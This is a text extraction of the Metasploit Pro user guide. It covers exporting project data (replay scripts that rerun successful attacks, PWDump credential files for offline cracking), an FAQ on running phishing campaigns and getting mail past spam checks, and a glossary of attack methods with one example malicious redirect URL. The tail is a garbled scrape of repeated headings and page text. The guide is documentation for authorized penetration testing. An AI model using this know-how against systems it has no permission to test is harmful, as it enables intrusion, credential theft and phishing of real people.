The Notification Center icon will turn green and alert you when the export starts and completes. You can click on the Notification Center icon to view a list of system wide alerts. When the export completes, you can click on the notification message or you can select Exports >Show Exports from the Project tab bar to access the Exports area. When the export is ready, it will listed be at the top of the Exports List. It will use the following naming convention: export-[current date and time]. If you do not see it at the top of the Exports List, click on the Create Date column name to sort the list by descending creation date. If an error occurred during the export and the export was unable to complete, you can view the export log to identify and troubleshoot any errors that occurred. For more information on export logs, see Export Logs on page 473.
Workspace ZIP
A workspace ZIP contains an XML export, which details the attributes for most of the objects in a project, and any associated directories that contain loot files, report files, and tasks logs. You can export a workspace ZIP to make a copy of a project, its data, and its files. This is useful when you want to back up your findings or when you want to import the data into other projects. When you export a project, Metasploit Pro generates a ZIP file that contains the following:
l
Exported XML file - Contains most of the objects in a project, including hosts, services, sessions, credentials, module details, and events. Reports directory - Contains all of the generated reports for the project. Tasks directory - Contains texts file that detail each task run. Loot directory - Contains the loot files for the project, including hashes and SSH keys.
Generating a ZIP of the Project

1. Open the project from which you want to export replay scripts. 2. Select Exports >Export Data from the Project tab bar. The Export Data page appears.
3. Choose ZIPWorkspace from the Export Format section.
4. Replace the export file name with a custom name, if you do not want to use the default name. (Optional)
Export Types
477
5. Use the Included addresses to explicitly define the hosts you want to include in the export. (Optional) 6. Use the Excluded addresses to explicitly define the hosts you want to exclude from the export. (Optional) 7. If you do not want to include credentials in the export, select the Mask credentials option from the Export Options section. 8. Click the Export Data button. When the export begins, you will be taken back to the Exports page. The Exports page displays an "Export creation queued" message. The Notification Center icon will turn green and alert you when the export starts and completes. You can click on the Notification Center icon to view a list of system wide alerts. When the export completes, you can click on the notification message or you can select Exports >Show Exports from the Project tab bar to access the Exports area.
The ZIP file will listed be at the top of the Exports List. It will use the following naming convention: export-[current date and time]. If you do not see it at the top of the Exports List, click on the Create Date column name to sort the list by descending creation date. If an error occurred during the export and the export was unable to complete, you can view the export log to identify and troubleshoot any errors that occurred. For more information on export logs, see Export Logs on page 473.
Replay Scripts
A replay script is a batch file that reruns tasks that opened sessions on target hosts. You can export a replay script to automate successful attacks through the pro console or msfconsole. When you export a replay script, Metasploit Pro creates a resource file for each opened session and compresses them into a ZIP file.
Export Types
478
Exporting Replay Scripts

1. Open the project from which you want to export replay scripts. 2. Select Exports >Export Data from the Project tab bar. The Export Data page appears.
3. Choose Replay Scripts from the Export Format section.
4. Use the Included addresses to explicitly define the hosts you want to include in the replay scripts. (Optional) 5. Use the Excluded addresses to explicitly define the hosts you want to exclude from the replay scripts. (Optional) 6. If you do not want to include credentials in the export, select the Mask credentials option from the Export Options section. 7. Click the Export Data button. When the export begins, you will be taken back to the Exports page. The Exports page displays an "Export creation queued" message. The Notification Center icon will turn green and alert you when the export starts and completes. You can click on the Notification Center icon to view a list of system wide alerts. When the export completes, you can click on the notification message or you can select Exports >Show Exports from the Project tab bar to access the Exports area. The ZIP file will listed be at the top of the Exports List. It will use the following naming convention: export-[current date and time]. If you do not see it at the top of the Exports List, click on the Create Date column name to sort the list by descending creation date. If an error occurred during the export and the export was unable to complete, you can view the export log to identify and troubleshoot any errors that occurred. For more information on export logs, see Export Logs on page 473.
Running the Replay Script with the ProConsole or MSFConsole

To run the replay script, you need to use the resource command. It loads the batch files and run them through the pro console or msfconsole.The resource command needs to include the path to the replay script. For example, you can enter resource /path/to/session_ID_IP.rc to load the replay script and run the commands stored in the file.
Export Types
479
Note: Before you can run the resource file, you will need to extract them from the ZIP file.
PWDumps
A PWDump is a text file that contains all of the credentials for a project, including plaintext passwords, SMB hashes, and SSH keys. You can export a PWDump file to perform offline password cracking with a tool like John the Ripper.
Exporting a PWDump
1. Open the project from which you want to export data. 2. Select Exports >Export Data from the Project tab bar. The Export Data page appears.
3. Select PWDump from the Export Format section.
4. Use the Included addresses to explicitly define the hosts you want to include in the export. (Optional) 5. Use the Excluded addresses to explicitly define the hosts you want to exclude from the export. (Optional) 5. Click the Export Data button. 6. When the export begins, you will be taken back to the Exports page. The Notification Center icon will turn green and alert you when the export starts and completes. You can click on the Notification Center icon to view a list of system wide alerts. When the export completes, you can click on the notification message or you can select Exports >Show Exports from the Project tab bar to access the Exports area. The PWDump will listed be at the top of the Exports List. It will use the following naming convention: export-[current date and time]. If you do not see it at the top of the Exports List, click on the Create Date column name to sort the list by descending creation date. If an error occurred during the export and the export was unable to complete, you can view the export log to identify and troubleshoot any errors that occurred. For more information on export logs, see Export Logs on page 473.
Export Types
480
Viewing Exported Data

To see a list of exported data, select Exports >Show Exports from the Project tab bar. The Data Exports list will display all exports associated with the project. You can click on the Download or View link to access each item.
Viewing Exported Data
481
FrequentlyAsked Questions
The following section provides answers to some of the most commonly asked questions, including:
l
How do I restart the Metasploit service on Linux? on page iv How do I restart the Metasploit service on Windows? on page v I set up my mail server, but it's not sending any e-mail. How can I troubleshoot this issue? on page ii Where do I configure the SMTP settings for my mail server? on page iii Why is there a partial blank screen on the video tutorials? on page iv How do I generate the diagnostics logs? on page ii My targets are behind a NAT gateway. How can I connect to them? on page 1
What does the "Metasploit is initializing" error mean?

The Metasploit is initializing error appears when the Metasploit Web UI cannot reach the Metasploit service. This error typically occurs after you install Metasploit, after you restart the Metasploit service, or after the product hangs and times out. If you recently updated or installed Metasploit, you may need to wait a few minutes for the service to restart. If the service does not restart, you should stop the Metasploit service and restart it.
Linux
For Linux systems, open a command line terminal and run the following command: $ sudo bash /opt/metasploit-<version> ctlscript.sh restart
Windows
For Windows systems, choose Start > Programs > Metasploit > Services > Stop Services. Then, choose Start > Programs > Metasploit > Services > Start Services to restart the Metasploit service.
How do I generate the diagnostics logs?

To run the diagnostic shell in Windows, select Start > All Programs > Metasploit > Diagnostics Log. Metasploit runs the diagnostics batch file and generates a Zip file that contains all of the Metasploit logs. You can find the generated Zip file, called diagnostic-date-time.zip, in /path/to/Metasploit. To run the diagnostic shell in Linux, open a command line terminal the following command: run sudo /opt/metasploit/diagnostic_logs.sh You can find the generated Zip file, called diagnostic-date-time.zip, in /opt/$INSTALL_ROOT.
I set up my mail server, but it's not sending any e-mail. How can I troubleshoot this issue?
To troubleshoot this issue, you need to take a look at the task log. To access the task log, click the Tasks tab. Find the campaign task and click on the task name. When the task log appears, search for any text highlighted in red. Any red text indicates that Metasploit encountered an error while processing the task. Errors like Server refused our mail indicates an issue with the mail server being able to authenticate the login or send the e-mail. Here are some of the most common restrictions that may prevent you from using your mail server to send phishing e-mails:
l
Your mail server performs reverse DNS checks and has rejected mail from Metasploit because it thinks that the e-mail is spam. If this is the case, you need to use a mail server that has less restrictive checks for spam, malicious files, and any type of e-mail abuse. Although these checks are in place to ensure that your e-mail infrastructure is secure, they prevent you from sending e-mails from Metasploit Pro. The port that you are using to send mail is blocked. The most common port used to send mail is port 25. If this port is blocked, try ports 465, 587, or 2525. The mail server is unable to authenticate the login. Check the authentication type configured for your mail server. By default, Metasploit uses the plain auth type.
ii
Where do I configure the SMTP settings for my mail server?

You can define the SMTP settings through the Global Settings or directly through the campaign. If you define the SMTP settings globally, Metasploit uses the SMTP settings as the default settings for all new campaigns that you create. To define global SMTP settings, select Administration > Global Settings from the Main menu. Find the SMTP Settings and fill out the domain and authentication information.
Nmap 6 is the latest version, so why does the Discovery Scan say that it sweeps with Nmap4 probes ?
Nmap4 does not stand for Nmap version 4.It stands for IPv4.
How do I uninstall Metasploit on Linux?

Uninstalling Metasploit Pro is a two step process. First you must stop the Metasploit service, then you must run a script that removes Metasploit and all its components. To uninstall Metasploit Pro, open the command line terminal. Change the current directory to the Metasploit directory. For example, if you used the default installation directory, you can type cd Metasploit-4.6.0. After you change the directory, type ./ctlscript.sh.stop to stop the Metasploit service, and then type./uninstall to run the uninstall script.
How do I add a module to Metasploit?

If you are on a Windows machine, browse to C:\metasploit\apps\pro\msf3\modules. If you are on a Linux machine, browse to $HOME\opt\metasploit-<version>\apps\pro\msf3\modules. You must match the path of the exploit with the physical structure defined within the Metasploit module directory. For example, if you want to use exploit/multi/browser/firefox_xpi_bootstrapped_addon, you must browser to C:\metasploit\apps\pro\msf3\modules\exploits\multi\browser and add the module to that location. After you add a module, open the Metasploit console and type reload_all to refresh your module list.
iii
Why is there a partial blank screen on the video tutorials?

The Microsoft Tuesday patch released onJuly 9, 2013 causes problems with video playback with high quality large videos generated with video tools, such as Camtasia, Premier Pro, and MoviePlus. To workaround this issue, you need to uninstall the patch associated with MS130-057. Read this article to learn how to uninstall a Microsoft patch.
How do I launch Metasploit Pro?

To launch the Metasploit Web UI, open a browser and go to https://localhost:3790. If you assigned the Metasploit service a different port, use that port instead of 3790.
Why are some areas of the UI not rendering correctly?

If you recently updated Metasploit Pro, you need to delete your browsers cache before you can view the correct rendering of the UI.
How often does Metasploit release new exploits?

The Metasploit team releases a weekly update to the Metasploit Framework and Metasploit Pro. The update typically includes bug fixes, small feature enhancements, and new modules. The Metasploit Web UI will alert you when there is an update available. If you are an msfconsole user, you can immediately get the latest modules that have been added to the Metasploit Framework. To update your local copy of the Metasploit Framework, open msfconsole and run msfupdate.
What do I do if I exceed the maximum number of license activations?

Single user license keys allow three unique installations. If you have exceeded this number, please contact sales@rapid7.com for assistance.
How do I restart the Metasploit service on Linux?

To restart the Metasploit service, open a command line terminal and run the following command: $ sudo bash /opt/metasploit-<version> ctlscript.sh restart
iv
How do I restart the Metasploit service on Windows?

First, you need to stop the Metasploit service. To stop the Metasploit service, choose Start > Programs > Metasploit > Services > Stop Services. Now, you can start the Metasploit service. To start the Metasploit service, choose Start > Programs > Metasploit > Services > Start Services.
Where can I find vulnerable targets to use for practice?

Metasploitable and Metasploitable 2 are virtual machines that are available for you to use as practice targets. The virtual machines contain intentionally vulnerable services. You can run tests against the virtual machines to discover the services and exploit the vulnerabilities that exist on them. For example, you can bruteforce Metasploitable to collect passwords from the system.
How do I import a target list into a project?

1. From within a project, click the Campaigns tab. 2. When the campaign management page appears, click on the Manage Reusable Resources tab. 3. Click the New Target List button. 4. When the Upload Target List page appears, click the Browse button. 5. Navigate to the location of the CSV file. 6. Select the CSV file and click the Open button. 7. Click the Save button.
How do I export a target list?

1. From within a project, click the Campaigns tab. 2. When the campaign management page appears, click on the Manage Reusable Resources tab. 3. When the Manage Reusable Resources page appears, select the target list that you want to export. 4. Click the Export button. 5. When the Open window appears, choose the Save File option and click OK. Metasploit Pro exports a CSV of the target list and saves it to your system.
How do I export the campaign findings?

1. From within a project, select Campaigns from the Tasks bar. The Manage Campaigns page appears. 2. Find the campaign that contains the data that you want to export and click the Findings link. 3. Click on the stat bubble that represents the data that you want to export. For example, if you want to export the list of human targets that opened the e-mail, click on the n% recipients opened the e-mail stat bubble. A list of human targets and the Export Data button appears. 4. Click the Export Data button. 5. When the Open window appears, choose the Save File option and click OK. The file saves to the Downloads folder on your system.
How long does it take for Metasploit Pro to update the findings?
Typically, it will take the campaign a few seconds after the human target performs an action to update the Campaign Findings.
How do I view the data that the human target submits?

1. From within a project, select Campaigns from the Tasks menu. The Manage Campaigns area appears. 2. Find the campaign whose results you want to view and click the Findings link. The Findings window appears and displays the statistics for the entire campaign. 3. Click on the # of recipients submitted form stat bubble. 4. When the target list appears, click on a human target name to view their campaign history. Any information that they have submitted will be documented on this page.
How can I export the data that the target submits?

Currently, you cannot export the data that the human target submits. However, you can view the data that they have submitted. 1. From within a project, click the Campaigns tab. 2. When the Manage Campaigns area appears, find the campaign whose data you want to view, and click the Findings link. 3. When the Campaign Findings window appears, click on the # of recipients who submitted the form stat bubble.
vi
4. Click on the name of a human target to view their campaign history. Any data that they have submitted will be stored on this page.
Why arent the findings updating after a human target opens a web page or submits a form?
If the human target is part of another campaign, and has already visited a spoofed web page or submitted data, a cookie has already been set for their browser. The human target will have to clear their browser cache in order for the campaign to start tracking them again.
Why arent the e-mail openings getting tracked?

In order for a campaign to track e-mail openings, the human target must download the images and enable links in the e-mail. Otherwise, the campaign will not be able to track the e-mail opening.
What causes the web server to go down?

The web server will go down if Pro service is stopped or restarted. Pro service typically goes down after an update or a system restart.
Why cant I view an image preview of my web pages in the campaigns report?
If you are running Metasploit Pro on a Linux system, you need to install the virtual frame buffer, or Xvfb, package to generate image previews in the campaigns report. To install the Xvfb package on Ubuntu, open a terminal and run the following command: $ sudo apt-get install xvfb To install the Xvfb package on CentOS, open a terminal and run the following command: $ sudo yum install xorg-x11-server-Xvfb If you are on Windows or if you are on Linux and have the Xvfb package installed, and the image preview is not being generated, it may be because the web page component uses an attack module. If the campaign uses a web page attack, a preview for the web page will not be generated for the report.
vii
How can I access my legacy campaigns?

1. Log in to your instance of Metasploit Pro. 2. When the Projects page appears, click on a project name to open it. 3. Locate the browser address bar. 4. Append /campaigns to the end of the URL and press enter. The old campaigns area appears.
Can I rerun a MetaModule?

No, you cannot rerun a MetaModule. If you want to rerun a MetaModule, you will need to configure a new MetaModule with the same settings.
How can I view the settings that were used for a MetaModule run?
The Metasploit web interface does not provide a way for you to view the settings that were used for a MetaModule run. However, you can review the generated MetaModule report to see some of the settings, such as the target network range and credentials that were used.
Where can I view the exploit status for a vulnerability?

When you perform vulnerability validation, Metasploit Pro tracks whether or not a vulnerability was successfully exploited. You can view the results from the Vulnerabilities tab (go to Analysis > Hosts > Vulnerabilities). Each vulnerability will have a status of Exploited or Not Exploited.
What are the exploit statuses?

A vulnerability can have one of the following exploit statuses:
l
Exploited - Metasploit Pro was able to exploit the vulnerability to obtain a session on the target. Not Exploitable - Metasploit Pro was unable to exploit the vulnerability.
Which versions of Nexpose do I need to perform vulnerability validation?

Nexpose Consultant and Nexpose Enterprise 5.7.16+ can be used with Metasploit Pro for vulnerability validation.
How can I rerun the Vulnerability Validation Wizard using my previous configuration?
Metasploit Pro currently does not provide the ability to rerun tasks created by the Vulnerability ValidationWizard.
viii
How can I view a list of vulnerabilities and their matched exploits?

You can go to the Findings window and click on the Exploit Matches tab. The Findings window displays a table of vulnerabilities and their matching exploits.
Why did Metasploit Pro not import all vulnerabilities from my Nexpose site?
Metasploit Pro only imports vulnerabilities for which it has correlating exploit modules. If Metasploit Pro does not have a matching exploit in its database, it will not import the vulnerability from a site.
How can I view the attack plan without actually running exploits?
You can select the Dry run option on the Exploit tab. Metasploit Pro creates the attack plan and prints it in the Task Log.
ix
Glossary
Administrator
An account that provides unrestricted access to manage user accounts, install updates, and configure global settings in Metasploit Pro.
Asset
A Nexpose term for a host or target that Nexpose scans for vulnerabilities.
Asset Group
A Nexpose term for a collection of assets.
Auxiliary Module
Any module that does not deliver a payload and does not obtain a shell on a remote target. An auxiliary module provides additional support for tasks that you need to perform a penetration test, such as scanning and fuzzing.
Berkeley Packet Filter

A packet filter that provides a raw interface to the data link layer and enables a very granular level of packet filtering.
Bind Shell Payload

Attaches a listener on the exploited system and waits for the attacking machine to connect to the listener.
Bruteforce
A password cracking method that attempts a large number of user name and password combinations until it successfully obtains access to a target.
Campaign
A logical grouping of components that you need to perform a social engineering attack.
Client-Side Exploit
An exploit that attacks vulnerabilities in client software, such as web browsers, e-mail applications, and media players. A client-side exploit is different from a traditional exploit because it requires the victim to initiate the connection between their machine and an attacking machine.
Command Injection (CMDi)

An attack method that injects and runs commands in a compromised application. Most command shell attacks take advantage of unvalidated user input, which enables an attacker to append a command sequence or escape string to execute arbitrary commands. If an command inject attack is successful, the attacker can use the exploited application as a pseudo shell to execute malicious code.
Credentials
A user name and password combination that provides access to systems and accounts.
Cross-site Request Forgery (CSRF)

An attack method that uses a victim's active session to exploit the victim's identity and privileges. During a Cross-site Request Forgery attack, an attacker sends a victim a URL to a web page that contains a link, form button, or some Javascript that performs an action. When the action is requested, it executes malicious actions on the attacker's behalf. For example, an attacker may force a victim to unknowingly perform tasks like make purchases, modify account information, transfer funds, or pretty much any action that the web application allows.
Cross-Site Scripting (XSS)

An attack method that injects a client-side script to exploit web applications and web pages. Most crosssite scripting attacks execute malicious code when a target visits an infected web page. Typically, the infected web page redirects the victim to a spoofed web page, which injects malicious code that enables the attacker to take over the session.
Data Exfiltration
A method of extracting data, such as simple file transfers that use netcat or ssh to perform a secure copy.
Glossary
xi
Discovery Scan
The internal Metasploit scanner that gathers port, service, and system information. It runs additional scanner modules based on the services that it identifies to gather more information about from the targets.
Direct Object Reference

An attack method that exploits a vulnerability in web applications that exposes an internal implementation object, such as a database record or file, to a user. Examples of common examples of direct object vulnerabilities include open redirects and direct traversals.
Egress Target
An external server hosted by Rapid7 that acts as an scan target. You can run the Firewall Egress Testing MetaModule against this target to identify open outbound ports from an internal host.
Exploit
An attack that leverages a vulnerability to deliver a payload to a target system.
File Format Exploit

An attack that takes advantage of a vulnerability in the way that an application processes data in a particular kind of file format, such as PDF, DOC, or JPEG. A file format exploit can run when a human target opens a attachment that contains the exploit.
Firewall Egress Testing MetaModule

A MetaModule that runs a full Nmap SYN scan against an external server hosted by Rapid7 to discover outbound ports on a firewall that an attacker can use to exfiltrate information.
Global Settings
Options that apply to all projects.
Host
A computer that is part of a network.
Host Comments
A tool that documents observations and information about a host.
Glossary
xii
Host Tags
A unique identifier used to categorize and group hosts.
Human Target
A person who is a recipient of a social engineering attack.
John the Ripper

A tool that you can use to crack password hashes in order to recover weak passwords.
Keyword Expression
A combination of a keyword definitive and a keyword that can be used to search for hosts and modules.

A MetaModule that systematically logs in to hosts and services using the known credentials for the project and attempts to open as many shells as possible.
Local File Inclusion (LFI)

An attack method that uses an include method to inject local files from the exploited server. LFI attacks typically exploit vulnerable parameters that enable an attacker to include code that is already hosted on the server. LFI attacks enable the attacker to gather user names, gather information from the log files, and remotely execute commands on the exploited server.
Listener
A process that runs on an exploited machine and waits for a connection for a bind shell payload.
Lockout Risk
The likelihood that a service enforces an account lockout.
Macro
A script that automatically runs a set of post-exploitation modules.
Glossary
xiii
MetaModule
A feature that provides a wizard-like interface that guides you through the configuration of a module. Each MetaModule focuses on singular penetration testing task, such as firewall egress testing, credential testing, and passive network discovery scanning.
Metasploit Framework
An open source penetration testing and development platform that provides access to the latest exploit code for various applications, operating systems, and platforms.
Module
A standalone piece of code that runs tasks and exploits.
Module Ranking
A rank that indicates the reliability and stability of an exploit. The higher the ranking, the less likely the exploit will crash a service. Use the module ranking to determine whether or not the module can reliably identify a target version.
Nexpose
A vulnerability analysis tool that automates the detection of vulnerabilities on an asset.
Nexpose Push
The process of sending vulnerability exceptions or validated vulnerabilities back to Nexpose.
Notification Center
The notification system for Metasploit that alerts you when a task completes or when a software update is available.
Packet Capture
A process that makes copies of packets off the wire.

A MetaModule that passively scans traffic to discover hosts on a local network.
Glossary
xiv
Pass the Hash

A technique that uses the NTLM or LM hash to authenticate a remote machine or service without the actual password.
Pass the Hash MetaModule

A MetaModule that attempts to log in to as many hosts as possible with a recovered Windows SMB hash and reports the hosts that it was able to successfully authenticate.
Password Cracking
The process of reverting a password hash to plaintext.
Password List
A dictionary or list of common passwords. A password cracker uses the password list and encrypts each word until it finds a matching hash.
Payload
The code that executes on the target system after an exploit successfully executes.
Persistent Listener
A process that runs on the Metasploit machine and waits for connect backs for reverse payloads. A persistent listener is another term for a handler.
Phishing
Phishing is a social engineering technique that uses e-mail to acquire sensitive information, such as user names, passwords, and credit card information, from a human target.
Portable File
A file that can be used for a USB drive drop. A portable file can be a generated executable file or a file format exploit that you load onto a USB key.
Post-Exploitation
The phase that occurs after exploitation. During post-exploitation, the data on the exploited machine is analyzed to determine the value and usefulness of the compromised host. Post-exploitation tasks include identifying configuration settings and mapping the network topology.
Glossary
xv
Project
A container for the targets, tasks, reports, and data that are part of a penetration test.
Proxy Pivot
An attack method that uses a compromised system to attack other systems on the same network.
Publicly Writable Directory

A directory that has write permissions that grants all users the ability to modify the directory and the files that it contains, including creating, deleting, and renaming files.
Report
A document that provides a detailed account of the information gathered in a project.

A payload that creates a connection from the target machine and returns a command prompt back to the attacker.
Remote FileInclusion (RFI)

An attack method that uses server-side scripts to exploit vulnerable web applications and enables the attacker to upload a remote file to the victim's server. RFI attacks typically exploit vulnerable include functions to link to remote scripts. These scripts will commonly allow an attacker to execute shell commands that enable them to upload files, create directories, and modify websites.
Scan Data
The host and vulnerability data imported from an external source, such as a vulnerability scanner like Nexpose and Nessus.
Session Fixation
An attack method that enables an attacker to hijack an established user session by forcing the session identifier (ID) to a specific value. During a session fixation attack, the attacker sends a victim a URL that contains the fixed session, which forces the victims's browser to use the selected session.When the victim clicks on the URL, the web application establishes that a session already exists for the user and does not create a new session. Therefore, when the victim logs into web application, the attacker is able to access the account using the same sessionID.
Glossary
xvi
Shell
An interface that can be used to interact with a system.
Single Testing Password MetaModule

A MetaModule that uses a known pair credential to log in to a range of hosts and services and reports on any hosts that it was able to successfully authenticate.
Site
A Nexpose term for a collection of assets and asset groups.
Sites
Refers to a website, or a collection of web pages, that is defined by a fully qualified domain name or IP address. A site can also refer to a web application.
SQL Injection (SQLi)

An attack method that exploits user input vulnerabilities to pass SQLqueries through a web application to the database.The database executes the SQL queries, which typically enables the attacker to modify or gain access to the database.

A MetaModule that attempts to log in to hosts with a recovered SSH key and records each successful login.
Target
A target can refer to the network, hosts, or type of systems that you want to exploit.
Target List
A list that defines the recipients and their e-mail addresses that will receive a phishing e-mail or some form of social engineering attack.
Task
An action that the system can perform, such as a scan, bruteforce attack, smart exploit, report generation, or data collection.
Glossary
xvii
Task Chain
A series of tasks that are linked together.
Task Schedule
The recurrence settings for a task chain. The task schedule determines the frequency at which the task chain runs.
Template
A reusable, shell of HTML that contains boilerplate that is used to quickly generate web page or e-mail content for a campaign.
Transportation Layer Encryption (TLS)

An Internet protocol that enables the ability to securely transmit and receive encrypted data between servers and clients that support Transportation Layer Security or Secure Socket Layer (SSL). TLS/SSL prevents non-trusted devices from allowing a third party to monitor or alter communication between a server and a client.
Unauthorized Access
Refers to the ability to obtain entry to system and network resources without valid permissions. An attacker can exploit vulnerabilities in authentication services, FTP services, and web services to obtain unauthorized access in order to do things like modify security policies, steal user names and passwords, and escalate privileges.
Unvalidated Redirect
A request that accepts untrusted and unvalidated user-supplied parameters to specify the redirection of the target. If the application does not validate the input value, the victim can be redirected to a malicious URL. This attack method is typically used in phishing attacks to get victims to unknowingly visit a malicious site. To exploit an unvalidated redirect, an attacker may craft a URL that uses a domain of a trusted site, such as http://www.yoursite.com. However, the URL may include a redirect function, such as http://www.yoursite.com/redirect.aspx?url=http://www.mysite.com, that sends the victim to a malicious site designated by the attacker.
Vulnerable Version
Refers to a version of an application or software that has known security vulnerabilities.
Glossary
xviii
vhost
Refers to the fully qualified domain name of a virtual host or server. Typically, vhosts are devices that can be accessed remotely by users to host data or utilize software services.
VPN Pivot
An attack method that uses the compromised system to route network traffic.
Vulnerability
Aa security flaw or weakness in an application or system that enables an attacker to compromise the target system.
Vulnerability Exception
An exception defines a scenario where it is acceptable for a vulnerability to exist. When you define an exception for a vulnerability, you exclude it from a report and consider the vulnerability as an accepted risk. It also refers to a vulnerability found by Nexpose that Metasploit Pro was unable to exploit.
Vulnerability Exception Reason

The reason why a vulnerability exists and why it should be excluded from the vulnerability assessment.
Vulnerability Result Code

The reason why a module did not run successfully.
Vulnerable Target
A potentially exploitable machine.
Web Audit
A feature that performs vulnerability checks for XSS, LFI, RFI, and SQLi flaws.
Web Crawl
A feature that recursively parses a website or namespace for hyperlinks that point to other web pages and follows the links to those other pages.
Glossary
xix
Web Exploit
A feature that matches exploits to known web vulnerabilities to create an attack plan. Web exploit runs the attack plan after it has been created and attempts to exploit the identified vulnerabilities.
Web Page
Refers to an HTML document that resides on the World Wide Web.
Web Scan
A feature that analyzes web application configurations and security. A web scan crawls websites, audits them for misconfigurations and common vulnerability types, such as XSS, LFI, RFI, and SQLi vulnerabilities, and exploits the identified vulnerabilities.
Web Vulnerability (WebVuln)

A security weakness or flaw that enables an attacker to compromise a web application. Most web vulnerabilities are caused by unvalidated user input, cross-site scripting, and injection flaws. These security flaws provide attackers with an opportunity to leverage the vulnerability to gain access to the web application to run arbitrary code.
Glossary
xx
Index
active session 329-330 Acunetix XML 129 administrator account 30 Amap Log 129 AppScan XML 129 asset 198 asset group 198, 212 authenticated web application scans 298 authentication note 331 authentication notes 218 automated exploit 235 automatic update 39 auxiliary module 118 Basic 298 bind shell payload 4 Browser Autopwn 343 bruteforce attack 218 Burp Session XML 129 campaign 349 create 351 definition 343 restrictions 349 campaign component 353
Campaign Dashboard 346 campaign findings 353 campaign reset 352 campaign state 349 campaign widget 347 click tracking 343 client-side exploit 339 command shell 330 Core Impact XML 130 custom scan template 205 Digest 298 Discovery Scan 4, 126-127, 135 e-mail alert 390 e-mail notification 355 e-mail template create 378 definition 343 executable definition 343 generate 383 exploit 235 Exploit 5, 235 exploit database 117 file format exploit about 339, 385 definition 343 download 386
xxii
generate 385 file system 334 Foundstone Network Inventory XML 129 Framework log 52 global settings 37 H.323 systems 136 host comment 112 add 112 host comments update 113 Host Details page 215 host tag 320 HTTP payloads 37 HTTPS payloads 38 human target 373 definition 344 text file 373 import 150 import data 204 IPv6 132 Java Signed Applet 339 John the Ripper 218 keyboard shortcut 27 keyword tags 121 Libcap 129 license key 44, 46 revert 48
xxiii
update 46 license key activation 45 License log 52 listener 237, 240 log files 52 LPORT 369 mail server 359 mail server configuration 359 malicious file 379 serving 380 malicious file attachment 379 manual exploit 235 Metasploit Framework 3 Metasploit Pro 2 Meterpreter 5, 331 Microsoft MBSA SecScan XML 129 module 3, 5, 237 excluded 118 module rankings 124 module search 121, 238 module statistics 123 modules about 117 nCircle IP360 129 Negotiate 298 Nessus NBE 129 Nessus XML 129
xxiv
NetSparker XML 129 network range 104 network range restriction 106 Nexpose 198-200 NeXpose 129 Nexpose asset group 212 Nexpose console 200 Nexpose raw XML 204 NeXpose Raw XML 129 Nexpose simple XML 204 NeXpose Simple XML 129 Nmap 138 Nmap command line 138 Nmap XML 129 non-administrator 30 NOP generator 118 NTLM 298 offline activation 47 offline update 58 pass the hash 207 Password 32 payload 5, 118 phishing 338, 387 phishing attack 344, 388 phishing campaign 387 Phishing Campaign Wizard 17
xxv
phishing e-mail create 389 portable file 369 about 340 create 369 download 371 Portable File 344 ports 128 post-exploitation module 118 Pro service error log 52 Production log 52 project 5, 97 create 98 view all 99 project members 109 project owner 102, 111 proof text 317 proxy pivot 332 purge 206 PWDump Export 129 Qualys Asset XML 129 Qualys Scan XML 129 Quick PenTest wizard 9 redirect page 368 resource file 344 restart services Linux 50
xxvi
Windows 50 result code 215 Retina XML 129 reverse shell 6 scan data 129 scan template 198 session clean up 392 shell 6 site 198 SMTP settings 40, 361 social engineering 336 definitioon 344 Social Engineering Campaign Details Report 393 generate 404 Spiceworks Inventory Summary CSV 130 SSL 299 tagged assets 208 target list 372, 374 CSV 373 definition 344 import 374 spreadsheet 374 target profile 10 task 6 task chain 408 team collaboration 109 template 375
xxvii
Thin log 52 time zone 35 tracking GIF 344 tracking link 345 tracking string definition 345 updates 57, 61 URL black list 298 USB key 383 user account 30, 34 user name requirements 36 virtual interfaces 333 visit definition 345 VM servers 133 VNC session 333 VPN pivot 332 vulnerability 6 vulnerability exception 187, 210 Web Application Assessment Report 305 web application exploit 303 web application test 297 Web Application Test Wizard 19 web application testing 19 web audit 301-302 web page 362
xxviii
web page template 376 create 375-376 web scan 296 Web server access log 52 Web server error log 52 web template 375 definition 345 wizard 9, 17 word list 232 word lists 233
xxix

Pro User Guide

Загружено:

Сведения о документе

Исходное описание:

Авторское право

Доступные форматы

Поделиться этим документом

Поделиться или встроить документ

Параметры публикации

Этот документ был вам полезен?

Это неприемлемый материал?

Авторское право:

Доступные форматы

Pro User Guide

Загружено:

Авторское право:

Доступные форматы

User Guide

Last Updated: March 21, 2014

Quick PenTest Wizard Target Settings

About Modules Modules Directory

Introduction to Metasploit Pro

About Metasploit Pro

Supported Operating Systems

Windows XP, 2003, Vista, 2008 Server, 7, and 8

About Metasploit Pro

Metasploit Pro Components

Metasploit Pro Components

Bind Shell Payload

test runs from within a project.

Reverse Shell Payload

Reverse Shell Payload

Metasploit Pro Workflow

Metasploit Pro Workflow

Quick PenTest Wizard

Quick PenTest Wizard

The following target profiles are available:

Configure Scan Settings

Configure Scan Settings

Configure Exploit Settings

Configure Exploit Settings

Configure Report Settings

Configure Report Settings

The Phishing Campaign Wizard

To launch the Phishing Campaign Wizard:

The Phishing Campaign Wizard

The Phishing Campaign Wizard

The Phishing Campaign Wizard

About the Phishing Campaign Wizard

About the Phishing Campaign Wizard

Configure the Phishing Campaign

Configure the Phishing Campaign

Web Application Test Wizard

Configure General Settings

Web Application Test Wizard

Configure Authentication Settings

Configure Vulnerability Discovery Settings

Configure Authentication Settings

Configure Vulnerability Exploit Settings

Configure Report Settings

Configure Vulnerability Exploit Settings

Configure Report Settings

Access the Metasploit Web UI on page 24 User Interface Overview on page 26

Access the Metasploit Web UI

Access the Metasploit Web UI

User Interface Overview

Navigational Menu and Features

User Interface Overview

The following image shows the navigational features:

Keys j/k ctrl+~ ctrl+SHIFT+~ F1 F3 Scrolls the page up or down.

To learn more about system administration, read the following topics:

Creating a User Account

Creating a User Account

6. Save the changes to the user account.

Changing an Account Password

2. Select the user account that you want to modify.

Changing an Account Password

Resetting the Password for a User Account

Resetting the Password for a User Account

Deleting a User Account